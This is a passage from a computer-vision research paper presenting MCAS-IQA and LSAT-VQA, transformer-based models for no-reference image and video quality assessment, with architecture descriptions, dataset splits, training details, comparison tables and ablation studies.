spatial selective attention into account that can be easily modelled by transformer models. We propose a multi-stage channel attention model based upon Swin Transformer to predict image quality. Channel attention can appropriately simulate the contrast sensitivity mechanism. The multi-stage structure can, on one hand, produce more accurate image quality perception, as demonstrated in existing IQA models [15–17]. On the other hand, such multi-stage structure can also generate more representative features covering different resolution scales to provide solid foundation for VQA tasks. Furthermore, inspired by the kernel idea of CNNs and RNNs that the kernels (e.g., convolution kernels) can be reused crossing individual image patches or time-steps, we also propose a locally shared attention module followed by a global transformer for VQA. Our experiments on large-scale IQA and VQA datasets will demonstrate promising performance of the proposed models. The remainder of the paper is organized as follows. Section 2 presents a multistage channel attention model using Swin Transformer as backbone for IQA. A VQA model using a locally shared attention module on frame quality features is detailed in Sect. 3. Experimental results and ablation studies are discussed in Sect. 4. Finally, Sect. 5 concludes the paper.
2 Multi-stage Channel Attention Integrated Swin Transformer for IQA (MCAS-IQA) In the proposed visual quality assessment framework, an IQA model needs to not only predict image quality accurately, but also serve as a general feature extractor for deriving quality features of video frames. Several mechanisms of the HVS play important roles in quality assessment, e.g., selective spatial attention, contrast sensitivity, adaptive scalable perception. Selective spatial attention is an inherent mechanism describing that viewers often allocate more attention to certain areas in the visual field than others. The attention allocation is determined by both viewing tasks and visual contents. Attention has been already widely studied in deep learning models, e.g., Swin Transformer and ViT [35] for image classification. However, the transformer based image models only consider spatial attention. In IQA scenario, another important mechanism, contrast sensitivity, plays a crucial role. Not all the distortions on an image can be perceived by the HVS. According to CSF, visual sensitivity is maximized at the fovea determined by the spatial frequency of visual stimuli and declined by eccentricity away from the gaze [12]. In other words, contrast change beyond certain frequency threshold will be imperceptible. Therefore, information in the frequency domain should also be considered in a deep learning driven IQA model. Even though the frequency information is not explicitly represented by a deep learning model, it can be simulated by the channel outputs. For example, Sobel operation is a convolutional operator that can distinguish high frequency information (e.g., edges) from low frequency information (e.g., plain areas). Since contrast sensitivity can be explained as the visual stimuli with different frequency can trigger different attentional degrees in visual system. Thus, we assume that it can be simulated by channel attention. Most deep learning models for image processing attempt to aggregate representative features in a manner of transferring spatial domain to channel. Consequently, the features
Visual Mechanisms Inspired Efficient Transformers
459
for target tasks are often extracted from feature maps with high channel dimension while reduced spatial resolution. Such an approach might be appropriate for classification or recognition purpose, while it can potentially lose information in the spatial domain in other scenarios. For example, feature fusion cross low-stage and high-stage feature maps is beneficial for object detection. We believe that spatial information also plays an important role in image quality perception, while crucial information in the spatial domain might be lost if only the highest stage feature map in a deep learning model is employed. Therefore, we attempt to use both low-stage and high-stage feature maps in the proposed IQA model. Swin Transformer uses a windowed architecture for reducing the complexity. It also provides a hierarchical structure facilitating information aggregation over different stages. The proposed IQA model employs Swin Transformer as a backbone network. However, Swin Transformer only accepts fixed size of input image resolution. Due to the particularity of quality assessment as explained earlier, we intend to avoid image rescaling to unalter the perceived image quality. In order to adapt images with arbitrary resolutions to Swin Transformer, an adaptive spatial average pooling is performed during patch embedding. If we set the input size as 384 × 384 and patch size as 4 × 4 in the Swin Transformer backbone, the pooling kernel size and stride will be both set to 96(=384/4). After an image with arbitrary resolution has been divided into individual patches by a 2D convolution layer, the adaptative pooling layer will be performed to adapt the embedded patches to a fixed size for the next process. Considering that the 2D convolution with the kernel number being the embedding dimension has been performed first that can convert spatial image features to channel domain, we assume that such adaptive pooling does not introduce spatial information loss for quality perception. Swin Transformer can decompose an input image into four stages, similarly to other CNNs. The feature maps at each stage have different spatial and channel resolutions. As explained earlier, we believe that attention over channels at each stage should both be considered, as the features over different channels can have different impacts on image quality perception. A lightweight channel attention block is built to represent the relative importance levels of different channel features. Thus, we propose to use a 1D dense layer (channel attention layer) with activation function of Sigmoid. A spatial average pooling is first performed on the feature maps at each stage, and then multiplied with the channel attention layer. In this way, higher attention weights will be assigned to more important information crossing channels during the training process. Furthermore, we propose to share the channel attention layer across different stages for two advantages. First, sharing a dense layer can significantly reduce its weights. Second, we assume that the attentional behavior over channels is similar at different stages, then sharing the attention layer can force the model to learn such similarity. If we can assume that the features in different channels within a stage represent information from low frequency to high, and such pattern is similar in other stages. Subsequently, if the channel attention layer finds out that features in certain frequency bands are more important than others in one Swin stage, such behavior should hold in other stages. However, the feature maps have different channel numbers at individual stages. In order to share the channel attention layer, a bottleneck conv-layer is used on the feature maps in different stages. The filter number of the bottleneck conv-layer is set to the same
460
J. You and Z. Zhang
Shared Channel Attention Bottleneck + Avg_pool
Bottleneck + Avg_pool
1×256
H×W×3
Swin Transformer Block
48×48×256
Stage 2
Patch Merging
RGB image
Linear Embedding
Patch partition
Adaptive spatial pooling
Stage 1
Bottleneck + Avg_pool
1×256
Swin Transformer Block
24×24×512
Bottleneck + Avg_pool
1×256 Stage 3
Swin Transformer Block
12×12×1024
1×256 Stage 4
Patch Merging
1×256
Patch merging
Head
Image Quality
Average
as the channel number of the highest stage feature map, and the kernel size is 1 × 1. Subsequently, the bottleneck layer is performed on the feature maps at each stage to unify their channel dimension. The feature maps are then pooled by the global spatial pooling and finally multiplied with the shared channel attention layer. Assuming that the bottleneck layer has K channels, a feature vector of size 1 × K will be produced at each stage.
Swin Transformer Block
12×12×1024
96×96×128
Fig. 1. Architecture of the MCAS-IQA model (Swin-B with input size of 384 Used for swin transformer). The number below each node indicates the output shape
Finally, a head layer is employed to derive image quality from the feature vectors. The head layer can be defined differently according to the prediction objective. In IQA tasks, MOS is often used representing the perceived quality by averaging over multiple subjective voters. Therefore, an IQA model can predict a single MOS value of an image directly, while it can also predict the distribution of quality scores over a rating scale, e.g., a commonly used five-point scale [bad, poor, fair, good, excellent]. In the former case, a dense layer with one unit and linear activation should be used as the head layer, and MSE between the ground-truth MOS values and predicted image quality is used as loss function. For the latter case, five units with Softmax activation are often used in the dense head layer, and the cross-entropy measuring distance on quality score distribution will be served as the loss function. In the experiments we will demonstrate the two cases on two IQA datasets. There are two approaches to combine the feature vectors at different stages into image quality. One approach is to apply the head layer on the feature vector at each stage first and then average over stages, and the other approach is to average the feature vectors over stages first and then apply the head layer. Our experiments have shown that the first approach shows slightly better performance than the second approach. Therefore, we have employed the first approach in this work, and Fig. 1 illustrates the architecture of the proposed MCAS-IQA model. As explained earlier, a feature vector with the size of 1 × K is derived at each stage, which conveys the most crucial and representative information for image quality perception in spatial and channel (frequency) domains by taking attention mechanism into account. Subsequently, by concatenating the feature vectors from the four stages, we obtain quality features over different scales and assume that the features represent general perceptual clues to be used in video quality assessment. In our experiments, the Swin-B method with input size of 384 × 384 is used as the Swin Transformer backbone.
Visual Mechanisms Inspired Efficient Transformers
461
Consequently, K equals to 256 and the concatenated quality feature vector on each frame has a shape of 1 × 1024. LSAT-VQA Architecture
Transformer Encoder
Video Quality
MLP Head
Mean over clips
clip number × 64
clip number × 64
Transformer Encoder Positional Embedding
2× PE3 F3
PE1 F1
PEn Fn
PE5 F5 1×64
1×64
1×64
Add & Norm 1×64
Dropout
Feature Projection (Dense Layer, 64 kernels) Mask C1 1×256
Shared Multi-head Attention
1×256
Mean
Mean
Mean
Mean
Linear
Linear
Linear
Linear
Concat
Concat
Concat
Concat
Scaled Dot-Product Attention
Scaled Dot-Product Attention
Scaled Dot-Product Attention
Dropout
Scaled Dot-Product Attention
Linear
Linear
Linear
Linear
Linear
Linear
Linear
Linear
Linear
Linear
Linear
V
K
Q
V
K
Q
V
K
Q
V
K
Q
Clip 3 (F×1024)
Add & Norm
Multi-Head Attention (mask)
Linear
Clip 1 (F×1024)
Frame Quality Features
1×256
1×256
Feed-forward
Cn
C5
C3
Clip 5 (F×1024)
Clip n (F×1024) PE1 F1
(1×1024)
PE2 F2
PEn Fn
clip number × 64 Zero padded features
Fig. 2. Architecture of the LSAT-VQA model and transformer encoder. The number below each node indicates output shape
3 Locally Shared Attention in Transformer for VQA (LSAT-VQA) In the proposed visual quality assessment framework, the VQA model is to aggregate the quality features over all frames in a video sequence into a video quality score. In other words, video quality is derived by pooling the quality features in the temporal domain. Transformer has already demonstrated outstanding performance in processing time-series data, while its quadratic time and memory complexities also impedes a direct use of Transformer for quality prediction of long video sequences. However, the basic unit of generating video quality perception might be short clips, rather than individual frames. We have performed a simple questionnaire in an unreported subjective VQA experiment to collect viewers’ opinion on whether they assessed video quality based on individual frames or short segments or the whole sequence. Most viewers have reported that they often retrospected to video clips, rather than frames, and combined the qualities of individual clips to determine the overall video quality. Thus, we propose to divide a video sequence into non-overlapping clips and process the quality features within individual clips, and finally the overall video quality is derived by pooling over clips. An overlapping division of clips has also been tested while no performance gain was obtained. Figure 2 illustrates the architecture of the LSAT-VQA model, and the details are presented as follows. Attention mechanism plays an important role in VQA. It can be reasonably assumed that viewers pay varying attention to different temporal segments. For example, varying contents and quality levels can potentially attract unbalanced attention in time. Such
462
J. You and Z. Zhang
uneven attention distribution can be modelled by the transformer encoder, as the selfattention module simulates the attention distribution over different segments in a video sequence. However, it is sophisticated to analyze the attentional behavior of quality assessment within a short segment. To our best knowledge, no psychovisual experiments have been conducted to study this issue. In this work, we hypothesize that attention mechanism can also be employed, i.e., different frames in a segment contribute unevenly to the quality at segment or clip level. More importantly, we presume that such attention modelling approach can be shared across different clips. In other words, an attention block will be reused in all the clips in a video sequence. Such idea has also been widely used in other deep learning models, e.g., the same kernel is used in CNN or RNN. The different aspect is that we intend to use only one single attention block, rather than multiple kernels as in CNN or RNN. This is to simplify the approach of modelling shortterm attention within video segments, and it can also significantly reduce the complexity of the subsequent global transformer model. The quality features from all the frames in a video clip are aggregated into a feature vector representing the perceptual information at clip level. Subsequently, the feature vectors from all the clips in a video sequence can be fed into a global transformer encoder to generate video quality prediction at sequence level. The multi-head attention (MHA) layer proposed in the original Transformer model [29] is used to model the attention distribution over frames in a clip. The dimension of MHA is set to 256, and the head number is set to 4 in this study. Our ablation studies show that the two parameters only have minor impact on the performance of the proposed LSAT-VQA model. The MHA block produces a feature map with shape of F × 256, where F is the frame number in a clip. Subsequently, the average over frames is taken as the feature vector with a shape of 1 × 256 for this clip. In addition, the situation that video sequences have different length should be handled in VQA models. Transformer can tackle varying input length. However, when performing batch training, padding operation is often used to pad video sequences with different numbers of frames to the same length in a batch. Zero padding is employed in this work. Consequently, the MHA block will also generate an all-zero feature vector on a clip with all zero padded frames. In order to exclude those padded frames from quality prediction, a masking operation has been performed by marking those all-zero feature vectors and assigning a very small value as the attention weights in the transformer encoder. Subsequently, a global transformer encoder is applied to the feature vectors on all clips. Four key hyper-parameters are used to represent a transformer encoder, namely L (layer), D (model dimension), H (head), and d ff (the feed-forward network). In our experiments, we have found that relatively shallow model parameters, e.g., {L = 2, D = 64, H = 8, d ff = 256}, produce promising performance for VQA. We assume that this is due to the fact that the employed VQA datasets are often in small-scale. In order to match the dimension of the feature vectors (i.e., 256) derived from the shared MHA block to the model dimension D of transformer encoder, we first perform a feature projection layer on the feature vectors. A dense layer with D filters is used for feature projection. As swapping the order of different clips can affect the perceived video quality, positional information should be retained in the transformer encoder. A learnable positional embedding is added to the projected feature vectors. The positional embedding layer
Visual Mechanisms Inspired Efficient Transformers
463
is set sufficiently long to cover the maximal length of video clips in the used VQA databases, which can be truncated for shorter videos. Equation (1) roughly explains the shared MHA block (S_MHA) on frame quality features (QF), the feature projection layer (Proj), and the positional embedding (PE), where C denotes the number of non-overlapping clips in a video sequence. ⎧ ⎪ CF = S_MHA(QFj ), QFj ∈ R1×K ⎪ ⎨ j (1) Fj = Proj(CFj ), CFj ∈ R1×256 ⎪ ⎪ ⎩ Z = [F + PE ; · · · F + PE ], F ∈ R1×D , PE ∈ RC×D 0
1
1
C
C
j
It is noted that no extra classification token has been added to the beginning of the project features, which is different from traditional transformer models for classification, e.g., BERT [30] and ViT [35]. Instead, the average of transformer encoder output along the attended dimension will be fed into the next process. Each encoder layer in transformer contains L sublayers for multi-head attention (MHA) with mask and a position-wise feed-forward layer (FF). Layer normalization (LN) is performed on the residual connection around the sublayers. Is should be noted that the MHA in the transformer encoder is different from the earlier shared MHA block. Equation (2) explains the pseudo approach of transformer encoder based on the output from the shared MHA block. Zl = LN (MHA(Zl−1 ) + Zl−1 ) l = 1, · · · L (2) Zl = LN (FF(Zl ) + Zl ) The encoder outputs at the last encoder layer are then averaged over all the clips to produce a quality vector with size of 1 × D. Such quality vector is supposed to contain the most representative information for quality perception at the sequence level. Finally, a multi-layer perceptron head layer is performed on the quality vector to predict video quality. The head layer consists of two dense layers and a dropout layer in between. Following other transformer architectures, e.g., BERT, ViT, Swin Transformer, GELU activation is used in the first dense layer with d ff units. As the goal of VQA in this task is to predict a single quality score, the second dense layer uses only one unit and linear activation. Accordingly, MSE is chosen as the loss function to measure the distance between the ground-truth MOS values and predicted video quality.
4 Experiments and Discussions 4.1 IQA and VQA Datasets Appropriate datasets are crucial for training deep learning models. Several large-scale databases with authentic distortions for IQA [8][36] and VQA [37][38] have been used in this work. To the best of our knowledge, there are currently three large-scale IQA datasets, including SPAQ [36], KonIQ-10k [8] and LIVE-FB [39]. SPAQ containing 11,125 images with diverse resolutions was produced in a controlled laboratory environment.
464
J. You and Z. Zhang
Hosu et al. conducted two large-scale quality assessment experiments on crowdsourcing platforms for IQA and VQA, respectively. Two datasets were published, namely the KonIQ-10k IQA dataset [8] containing over 10,000 images with a constant resolution of 1024 × 768 and KonViD-1k VQA dataset [37] consisting of 1,200 videos with varying resolutions and durations. It should be noted that the quality score distributions from the participants have also been published in the KonIQ-10k dataset. Therefore, we can use the IQA model to predict the score distribution by using five units and Softmax activation in the head layer. On the other hand, only MOS values were published in the SPAQ dataset, and a single unit with linear activation is used in the head layer. In addition, although LIVE-FB [39] contains 39,806 images, the largest (by far) IQA dataset, it is actually assembled from several existing databases purposed for other tasks than IQA. Consequently, the MOS values of 92% images in LIVE-FB locate in a narrow range of [60, 80] out of the full range [0, 100], which is inappropriate for training IQA models due to lack of representative distortions of diverse image quality levels. Thus, the evaluation of IQA models has been mainly conducted on KonIQ-10k and SPAQ in our experiments. In addition, another large-scale VQA dataset, YouTube-UGC [38], consists of 1,288 videos with authentic distortions. The evaluation of VQA models has been mainly performed on KonViD-1k and YouTube-UGC. Differently from other computer vision tasks where individual databases can be combined directly, e.g., image classification and object detection, quality assessment datasets might be incompatible from each other. A tricky issue is quality level calibration between separate datasets. For example, two images with similar quality level might be assigned with dramatically different quality values in two subjective experiments, because the calibration levels deviate significantly. Some researchers have attempted to combine multiple datasets to train a single IQA model, e.g., UNIQUE model [40] and MDTVSFA [41]. While in this work, we still concentrate on training IQA/VQA models on individual datasets. Subsequently, the individual datasets were randomly split into train, validation and test sets following the standard protocol. However, in order to avoid the long tail issue, we first roughly divided the samples in each dataset into two complexity categories (low and high) based on the spatial perceptual information (SI) and temporal information (TI) defined by the ITU Recommendation [42]. The samples in each category were then roughly divided into five quality subcategories based on their MOS values. Finally, we randomly chose 80% of the samples in each subcategory as train set, 10% as validation set and the rest 10% as test set. Such random split has been repeated for ten times. Furthermore, three other small-scale quality assessment datasets with authentic distortions, namely CID2013 [43] and CLIVE [44] for IQA, and LIVE-VQC [45] for VQA, have also been included to evaluate the generalization capabilities of different models. It should be noted that individual datasets use different ranges of MOS values, e.g., [0, 100] in SPAQ, CLIVE and LIVE-VQC, and [1, 5] in CID2013, KonIQ-10k, KonViD-1k and YouTube-UGC. For convenient evaluation across datasets, all the MOS values were linearly normalized into the range of [1, 5] in our experiments.
Visual Mechanisms Inspired Efficient Transformers
465
4.2 Training Approach The performance of deep learning models is heavily dependent on training approach. For training the MCAS-IQA model, transfer learning for the Swin Transformer backbone pretrained on ImageNet was applied. However, there are no available large-scale pretrained models for video processing. Thus, the VQA models have been trained from scratch. In our experiments, the training process of each model was performed in two phases: pretrain and finetune. In both two phases, a learning rate scheduler of cosine decay with warmup was used in the Adam optimizer. The base learning rate was determined from a short training by changing learning rates and monitoring the model results. We have found that 5e-5 and 1e-6 produced the best performance in the pretrain and finetune phases in training the MCAS-IQA model. For training the LSAT-VQA model, we have finally used 1e-3 and 5e-5 as base learning rates in pretrain and finetune, respectively, together with a large batch size. Data augmentation is widely used in model training to increase the dataset size. However, due to the particularity of quality assessment, most image or video augmentation methods might be inappropriate as they can affect the perceived quality. We have investigated popular image augmentations, e.g., transformation, adding noise as those implemented in [46], and found that only horizontal flip has no significant impact on image quality. For LSAT-VQA training, the quality features on horizontally flipped frames were also computed and included the training process. In addition, 25% randomly chosen videos in the train set were reversed in each batch in the training, i.e., the quality features ordered from the last frame to the first are fed into LSAT-VQA. Even though such approach seems to be conflict with the conclusion that swapping video clips can affect video quality, we have found that using reversed video in training improves the performance slightly. During the training process, the Pearson correlation (PLCC) between the predicted quality scores and ground-truth MOS on the validation set was used to monitor the performance of trained models. Early stop has also been employed to avoid overfitting. All the models were trained on the individually split train sets on two GeForce RTX 3090 GPUs and the best weights were determined by PLCC values on the validation sets. Subsequently, the model performance was evaluated on the test sets in terms of three criteria: PLCC, Spearman rank-order correlation (SROCC) and root mean squared error (RMSE) between the predicted quality scores and the ground-truth MOS values. 4.3 Comparison and Ablations of IQA Models Table 1 reports the evaluation results of the proposed MCAS-IQA model compared against other state-of-the-art models, including several deep learning driven models: DeepBIQ [7], Koncept512 [8], TRIQ [14], MUSIQ [15], AIHIQnet [16], CaHDC [17] and hyperIQA [18]. Other detailed results can be found on the code repository page. The comparison results demonstrate that MCAS-IQA significantly outperforms other compared models. We assume that the reasons are two twofold. First, Swin Transformer as the backbone with large-scale pretrain has outstanding representative capability. Second, we presume that the proposed multi-stage architecture of shared channel attention can appropriately simulate the perceptual mechanisms of IQA.
466
J. You and Z. Zhang
Table 1. Evaluation results (average and standard deviation) on the test set on individual IQA datasets Models
KonIQ-10k
SPAQ
PLCC↑
SROCC↑
RMSE↓
PLCC↑
SROCC↑
RMSE↓
DeepBIQ
0.873 ± 0.021
0.864 ± 0.037
0.284 ± 0.029
0.858 ± 0.027
0.861 ± 0.028
0.389 ± 0.035
Koncept512
0.916 ± 0.116
0.909 ± 0.085
0.267 ± 0.094
0.831 ± 0.097
0.830 ± 0.080
0.384 ± 0.060
TRIQ
0.922 ± 0.018
0.910 ± 0.011
0.223 ± 0.030
0.916 ± 0.027
0.925 ± 0.015
0.324 ± 0.021
MUSIQ
0.925 ± 0.011
0.913 ± 0.029
0.216 ± 0.026
0.920 ± 0.010
0.918 ± 0.006
0.339 ± 0.030
AIHIQnet
0.929 ± 0.020
0.915 ± 0.014
0.209 ± 0.022
0.929 ± 0.022
0.925 ± 0.019
0.326 ± 0.027
CaHDC
0.856 ± 0.027
0.817 ± 0.025
0.370 ± 0.041
0.824 ± 0.030
0.815 ± 0.019
0.486 ± 0.068
hyperIQA
0.916 ± 0.030
0.907 ± 0.027
0.242 ± 0.012
0.910 ± 0.026
0.915 ± 0.020
0.329 ± 0.028
MCAS-IQA
0.956 ± 0.020
0.944 ± 0.015
0.163 ± 0.023
0.933 ± 0.021
0.926 ± 0.021
0.304 ± 0.020
In order to fully reveal the benefit of using multi-stage channel attention architecture, we have conducted three ablation studies: 1) No multi-stage and no-channel attention: the output from the last Swin Transformer block is averaged and then fed into the head layer directly; 2) No multi-stage but with channel attention: the channel attention layer is performed on the output from the last Swin Transformer block; and 3) Multistage without channel attention: the outputs from the four Swin Transformer blocks are averaged and then fed into the head layer. Table 2 presents the results in terms of the averaged criteria between KonIQ-10k and SPAQ. The ablation studies confirm that using multi-stage and shared channel attention architecture dramatically improve the performance on IQA. Furthermore, it seems that using channel attention offers more benefit than the multi-stage approach in the proposed MCAS-IQA architecture. Subsequently, we have conducted another experiment to evaluate the generalization capability of MCAS-IQA, as reported in Table 3. The model was first trained on one dataset and then tested on another dataset, e.g., KonIQ-10k vs. SPAQ indicates MCASIQA was trained on KonIQ-10k and tested on entire SPAQ, vice versa. We have also trained MCAS-IQA on the combination of KonIQ-10k and SPAQ and then tested on entire CID2013 and CLIVE datasets, respectively. According to the evaluation results, MCAS-IQA shows strong generalization capability across datasets and subjective experiments, which provides a solid foundation to use MCAS-IQA as a general model to derive
Visual Mechanisms Inspired Efficient Transformers
467
quality features for VQA. Thus, MCAS-IQA trained on the combination of KonIQ-10k and SPAQ has been employed to compute the quality features of every frame in video sequences for the VQA experiments. Table 2. Ablation studies on MCAS-IQA Ablations
PLCC
SROCC
RMSE
Original MCAS-IQA
0.945
0.935
0.234
1) No multi-stage, no channel attention
0.913
0.903
0.302
2) No multi-stage, with channel attention
0.936
0.919
0.280
3) Multi-stage, without channel attention
0.925
0.927
0.258
Table 3. Model generalization studies Datasets
PLCC
SROCC
RMSE
KonIQ-10k vs. SPAQ
0.861
0.875
0.454
SPAQ vs. KonIQ-10k
0.834
0.829
0.309
Tested on CID2013
0.858
0.853
0.602
Tested on CLIVE
0.864
0.877
0.584
Table 4. Evaluation results (average and standard deviation) on the test set on individual VQA datasets Models
KonVID-1k PLCC↑
YouTube-UGC SROCC↑
RMSE↓
PLCC↑
SROCC↑
RMSE↓
TLVQM
0.76 ± 0.02 0.76 ± 0.02 0.42 ± 0.03 0.68 ± 0.03 0.65 ± 0.03 0.49 ± 0.02
VSFA
0.80 ± 0.03 0.80 ± 0.02 0.40 ± 0.03 0.77 ± 0.03 0.79 ± 0.04 0.41 ± 0.03
3D-CNN
0.80 ± 0.02 0.81 ± 0.03 0.38 ± 0.02 0.71 ± 0.03 0.72 ± 0.04 0.44 ± 0.02
VIDEAL
0.67 ± 0.02 0.65 ± 0.02 0.50 ± 0.03 0.66 ± 0.03 0.68 ± 0.03 0.49 ± 0.02
LSCT
0.84 ± 0.02 0.85 ± 0.02 0.34 ± 0.03 0.82 ± 0.04 0.82 ± 0.03 0.39 ± 0.02
ST-3DDCT 0.73 ± 0.02 0.74 ± 0.02 0.44 ± 0.03 0.48 ± 0.04 0.49 ± 0.04 0.59 ± 0.03 StarVQA
0.80 ± 0.04 0.80 ± 0.03 0.40 ± 0.02 0.80 ± 0.06 0.78 ± 0.03 0.44 ± 0.02
LSAT-VQA 0.85 ± 0.02 0.84 ± 0.02 0.33 ± 0.02 0.85 ± 0.03 0.83 ± 0.03 0.38 ± 0.03
468
J. You and Z. Zhang Table 5. Evaluation results (average and standard deviation) on the combined dataset
Models
Combined test set PLCC↑
SROCC↑
RMSE↓
TLVQM
0.71 ± 0.02
0.74 ± 0.02
0.46 ± 0.02
VSFA
0.79 ± 0.02
0.79 ± 0.03
0.44 ± 0.03
3D-CNN
0.71 ± 0.02
0.72 ± 0.02
0.49 ± 0.02
VIDEAL
0.67 ± 0.02
0.67 ± 0.12
0.57 ± 0.02
LSCT
0.81 ± 0.04
0.80 ± 0.03
0.41 ± 0.05
ST-3DDCT
0.59 ± 0.03
0.60 ± 0.02
0.58 ± 0.02
StarVQA
0.77 ± 0.05
0.79 ± 0.04
0.48 ± 0.04
LSAT-VQA
0.84 ± 0.02
0.83 ± 0.04
0.40 ± 0.04
Table 6. Performance evaluation and inference time relative to LSAT-VQA on LIVE-VQC dataset Models
PLCC
SROCC
RMSE
Time
TLVQM
0.432
0.450
0.593
4.8
VSFA
0.663
0.640
0.540
2.3
3D-CNN
0.598
0.603
0.522
2.7
VIDEAL
0.495
0.445
0.601
7.2
LSCT
0.702
0.730
0.497
3.4
ST-3DDCT
0.474
0.489
0.607
1.4
StarVQA
0.667
0.705
0.528
1.5
LSAT-VQA
0.724
0.726
0.490
1.0
4.4 Experiments on VQA Models For VQA, LSAT-VQA has been compared against the following state-of-the-art models: TLVQM [6], VSFA [22], 3D-CNN [23], VIDEAL [24], LSCT [25], ST-3DDCT [27] and StarVQA [31]. Table 4 reports the average and standard deviation of the evaluation criterions on individual VQA datasets and their combination. When using the combined dataset, the train sets, validation sets from KonViD-1k and YouTube-UGC were combined respectively in each of the ten random splits to train the VQA models, and then they were evaluated on the combined test sets. According to the comparison results, the proposed LSAT-VQA model show dramatically better performance than the compared models by a large margin. We assume that the reasons are still twofold. First, the proposed MCAS-IQA model that has been dedicatedly trained for IQA provide a solid foundation to derive frame features representing perceptual quality information. Next, the locally shared attention module based on transformer can appropriately represent the VQA mechanism in temporal domain, especially the clipping operation and using
Visual Mechanisms Inspired Efficient Transformers
469
transformer for temporal polling over clips are in accordant with the subjective process performed by human viewers in VQA. Table 6 also reports the evaluation result of the models trained on the combined KonViD-1k and YouTube-UGC dataset and then tested independently on the LIVEVQC dataset. Due to high diversity of video contents and quality levels, it is expected that VQA models should have weak generalization capability. However, the proposed LSAT-VQA model still shows promising potential to become a general VQA model that can be applied to a wide range of video contents, resolutions, and distortions. In addition, we have also compared the inference time of different VQA models on LIVE-VQC dataset. Average inference time including feature derivation and quality prediction was computed. The proposed VQA model is still the fastest, e.g., it takes ~ 300ms for a HD video with 5 s duration. Table 6 also reports a rough comparison result on inference time of other models related to the proposed LSAT-VQA model. Furthermore, the LSAT-VQA is lightweight, and the size of the model file is only ~ 5MB. Table 7. Evaluation Results of LSAT in the Ablation Studies Ablations
PLCC
SROCC
RMSE
Original LSAT-VQA
0.843
0.834
0.398
1)
MHA_S: [64, 4]
0.841
0.834
0.401
MHA_S: [1024, 8]
0.836
0.830
0.412
2)
No locally shared attention
0.765
0.796
0.451
3)
Clip length: 8
0.849
0.834
0.399
Clip length: 128
0.838
0.831
0.404
4)
Transformer: [2, 32, 4, 64]
0.842
0.835
0.399
Transformer: [4, 256, 8, 1024]
0.836
0.829
0.308
LSAT on ResNet50 features
0.829
0.827
0.426
5)
Considering that the complexity of the global transformer is directly determined by the input length, sharing and reusing the local MHA in all the non-overlapping clips can dramatically reduce the length of the transformer input. Thus, it is important to dig into the architecture of building transformer on top of locally shared MHA. The first three ablation experiments are focused on comparing variations of the shared MHA layer, its influence on VQA, and clip length. In addition, another ablation has also been conducted to study the hyper-parameter settings of the global transformer. Finally, in order to evaluate the influence of dedicated IQA models on video quality perception against other pretrained image models, the ImageNet pretrained ResNet50 is used to extract features from video frames and then fed into the proposed LSAT-VQA model in the fifth ablation. All the ablation studies were performed on the combined dataset of KonViD-1k and YouTube-UGC. The following summarizes the ablation experiments and Table 7 reports the average results over the ten random splits.
470
J. You and Z. Zhang
1) Set the dimension and head number in the locally shared MHA layer to [64, 4] and [1024, 8], respectively; 2) Do not use the locally shared MHA layer, i.e., the frame quality features are fed into the transformer encoder directly; 3) Set the clip length to 8 and 128, respectively; 4) Test two hyper-parameter settings in the global transformer; 5) Feed the ResNet50 features into LSAT-VQA. According to the ablation studies, the setting of the locally shared MHS is not very crucial for the performance of LSAT-VQA. However, a sole transformer encoder without the locally shared MHA significantly drops the performance. This partly confirms our assumption that the proposed local-global structure is appropriate for VQA, which is also in line with the observation that viewers often gauge video quality based on temporal pooling over clips, rather than frames. Furthermore, it is observed that relatively short clip length seems to produce slightly better performance in the proposed LSAT architecture. Considering that a longer clip length can reduce more complexity of transformer, it is worth finding an optimal balance between clip length and model accuracy. In our experiments, we have found that clip length 32 generally offers the optimal performance in video quality prediction. In addition, even though large transformer models often show outstanding performance in language modelling and computer vision tasks, this is not the case in our experiments. For example, the deep transformer encoder in ablation 4) does not produce higher performance than the shallow one. Our hypothesis is that training on relatively small-scale VQA datasets cannot take the full advantage of large models. Finally, the last ablation study demonstrates that a dedicated and retrained IQA model definitely benefits VQA tasks more than a pretrained image classification model.
5 Conclusion This paper proposed an efficient and general framework for no-reference image and video quality assessment by windowed transformers. Considering several important visual mechanisms in IQA, a multi-stage channel attention model MCAS-IQA built on Swin Transformer as backbone has been developed. MCAS-IQA demonstrates outstanding performance to predict perceived image quality whilst providing generic image quality features for VQA. Subsequently, inspired by the subjective mechanism that video quality is potentially a fusion of quality assessment over short video segments, we proposed a locally shared attention module followed by global transformer for VQA. By reusing local attention crossing video clips, the proposed LSAT-VQA model accurately predict video quality in an efficient manner. Complete comparison experiments have demonstrated outstanding performance of the proposed IQA and VQA models. The ablation studies have also revealed influence of individual building components driven by relevant visual mechanisms on image and video quality assessment.
Visual Mechanisms Inspired Efficient Transformers
471
References 1. Wang, Z., Sheikh, H.R., Bovik, A.C.: Objective video quality assessment. In: The Handbook of Video Databases: Design and Applications, pp. 1041–1078. CRC Press, (2003) 2. Sazaad, P.Z.M., Kawayoke, Y., Horita, Y.: No reference image quality assessment for JPEG2000 based on spatial features. Signal Process. Image Commun. 23(4), 257–268 (2008) 3. Shahid, M., Rossholm, A., Lövström, B., Zepernick, H.-J.: No-reference image and video quality assessment: a classification and review of recent approaches. EURASIP Journal on Image and Video Processing 2014(1), 1–32 (2014). https://doi.org/10.1186/1687-5281-201 4-40 4. Mittal, A., Moorthy, A.K., Bovik, A.C.: No-reference image quality assessment in the spatial domain. IEEE Trans. Image Process. 21(12), 4695–4708 (2012) 5. Saad, M.A., Bovik, A.C., Charrier, C.: Blind prediction of natural video quality. IEEE Trans. Image Process. 23(3), 1352–1365 (2014) 6. Korhonen, J.: Two-level approach for no-reference consumer video quality assessment. IEEE Trans. Image Process. 28(12), 5923–5938 (2019) 7. Bianco, S., Celona, L., Napoletano, P., Schettini, R.: On the use of deep learning for blind image quality assessment. SIViP 12(2), 355–362 (2017). https://doi.org/10.1007/s11760-0171166-8 8. Hosu, V., Lin, H., Sziranyi, T., Saupe, D.: KonIQ-10k: An ecologically valid database for deep learning of blind image quality assessment. IEEE Trans. Image Process. 29, 4041–4056 (2020) 9. Itti, L., Koch, C.: Computational modelling of visual attention. Nat. Rev. Neurosci. 2, 194–203 (2001) 10. Engelke, U., Kaprykowsky, H., Zepernick, H.-J., Ndjiki-Nya, P.: Visual attention in quality assessment. IEEE Signal Process. Mag. 28(6), 50–59 (2011) 11. Kelly, H.: Visual contrast sensitivity. Optica Acta: Int. J. Opt. 24(2), 107–112 (1977) 12. Geisler, W.S., Perry, J.S.: A real-time foveated multi-resolution system for low-bandwidth video communication. In: SPIE Human Vision Electron. Imaging, San Jose, CA, USA, vol. 3299, pp. 294–305 (1998) 13. Zhang, 